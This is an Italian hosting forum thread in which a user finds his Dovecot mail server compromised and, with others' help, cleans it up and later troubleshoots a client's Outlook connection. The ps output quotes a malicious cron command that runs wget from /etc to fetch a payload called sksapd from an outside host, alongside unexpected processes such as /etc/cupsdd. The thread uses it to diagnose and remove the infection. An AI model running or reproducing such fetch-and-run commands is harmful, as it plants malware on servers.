- Home
- Categorie
- Coding e Sistemistica
- Hosting, Server e Domini
- mi si spegne dovecot
-
volevo scriverti.. ma non trovo i MP
mi daresti un agancio per poterti scrivere? skype, o altro..
non capisco il motivo..ho fastweb ed ho notato che ad un certo punto il mio server configurato come tu sai mi blocca la rete..
cioè noto che facendo ping a google esempio perdo dei pacchetti...
invece se spengo il server questo non succedeboooooo
-
con NetHogs vedo cose strane..
esempio
6770 root wget eth0 0.271 11.532 KB/sec
6767 root wget eth0 0.274 10.791 KB/sec
6764 root wget eth0 0.144 4.731 KB/sec
6766 root wget eth0 0.105 2.366 KB/sec
6830 root /etc/cupsdd eth0 0.132 0.084 KB/sec
5592 gio sshd: gio@pts/0 eth0 1.077 0.052 KB/sec
? root 192.168.1.111:25-196.215.161.78:63951 0.000 0.000 KB/sec
6774 root wget eth0 0.000 0.000 KB/sec
? root 192.168.1.111:110-82.184.253.178:2900 0.000 0.000 KB/sec
? root 192.168.1.111:110-82.184.253.178:52082 0.000 0.000 KB/sec
6768 root wget eth0 0.000 0.000 KB/sec
2841 root /root/.dropbox-dist/dropbox eth0 0.000 0.000 KB/sec
6763 root wget eth0 0.000 0.000 KB/sec
? root unknown TCP 0.000 0.000 KB/secma io di wget non ne ho lanciati.. e quei PID ? cosa sono???
aiuto mi hanno bucato?
-
root@goldrake:/bin# ps aux |grep wget
root 6719 0.0 0.0 4348 1240 ? Ss 11:00 0:00 /bin/sh -c cd /etc; wget (qui cè http.. eccc)dgnfd564sdf.com:8080/sksapd
root 6764 0.0 0.0 5908 1544 ? S 11:00 0:00 wget (qui cè http.. eccc)dgnfd564sdf.com:8080/sksapd
root 10333 0.0 0.0 3568 800 pts/0 S+ 11:15 0:00 grep wget
-
Mi sa che ti hanno aperto come un cozza
-
:_(
ho seguito questo
askubuntu.com/questions/397934/what-do-sapd-skysapd-sksapd-and-ksapd-doho proprio quei file.. ora cancellati..
i wget non li ho piu..
ma in nethogs mi rimangono questi
? root 192.168.1.111:110-82.184.253.178:4967cosa sono?
-
ilgio ti rispondo adesso in privato.
-
Riprendo la discussione dicendoti che la guida di Falko Timme presenta molte lacune (e pare ovvio, lui fa hosting e non regala il mestiere a nessuno).
La valutazione che ho fatto leggendo il modo in cui configura un server non presenta delle configurazioni corrette per fail2ban, ovvero non ti dice come configurare al meglio questo pacchetto. Non parla di firewall, lasciando tutto al caso con iptables che lavora in default. Non parla di come vada customizzato in modo corretto un host virtuale con accesso ai servizi critici con tunnell ssl.
È una guida per principianti, di certo è una buona base di partenza ma non va bene su un sistema di produzione.
-
Allora prova a disinstallare e reinstallare i seguenti pacchetti:
apt-get remove dovecot-core dovecot-imapd dovecot-mysql dovecot-pop3d dovecot-sieveInstallali di nuovo con il seguente comando:
apt-get install dovecot-core dovecot-imapd dovecot-mysql dovecot-pop3d dovecot-sieveFammi sapere... ciauz
-
per adesso sembra funzionare..
ho fatto ciò che hai detto
in piu ho tolto quei pacchetti skysapd ecc...
avevo pieno la etc di quei eseguibili..
ripulito il croncambiato soprattutto passwd di root che era molto debole
e per ora sembra funzionare
-
Perfetto, tieni a mente di verificare periodicamente le regole del firewall ufw con il comando:
ufw statusverificando che le porte 25, 110 e 143 TCP siamo aperte e in ascolto.
Inoltre verifica se amavisd-new è in ascolto sulle porte 10024 e 10025 in locale, diversamente attivalo con il comando:
ufw allow from 127.0.0.1 to any port 10024
ufw allow from 127.0.0.1 to any port 10025A presto.
-
dopo aver riconfigurato il server con tutte le caselle di posta ei clienti...
sembrava tutto OK, ma su un PC di un cliente con outlook non si riesce piu a rimettere l'account di posta.
ho provato anche con thunerbird, ma niente da fare..
mi dice che non riesce a collegarsi al server.il fatto è che se provo a configurare la stessa casella su un'altro PC riesco perfettametne..
che cosa è successo a quel PC ??
-
La tua è la classica domanda dalle 100 pistole... dato che il problema riguarda solo questa casella e non tutte le altre ospitate sul server e questo PC in particolare...
-
perchè se da quel PC faccio da prompt
telnet pop.dominio.it 25
mi da impossibile aprire una connessione con....invece da qualsiasi altro PC mi risponde??
-
Da prompt devi dare il comando
telnet mail.nomedominio.tld 25Il record MX è mail...
-
ok si..
mi da impossibile connettersi
mentre su altri PC funzia
-
C'è un firewall sul pc che non permette la connessione verso l'smtp.
-
ho disattivato tutto il firewall di windows
niente..
ho creato un nuovo utente.. ma nemmeno su quell'utente.. quindi è qualcosa di sistema
-
vedo che si connette in telnet solo ad aruba con
telnet pop3s.pec.aruba.it 995
della quale il cliente ha una casella in outlook
-
A volte ci sono pure antivirus che fanno da "filtro" o simile .. prova a vedere pure quello.
-
provo a disinstallarlo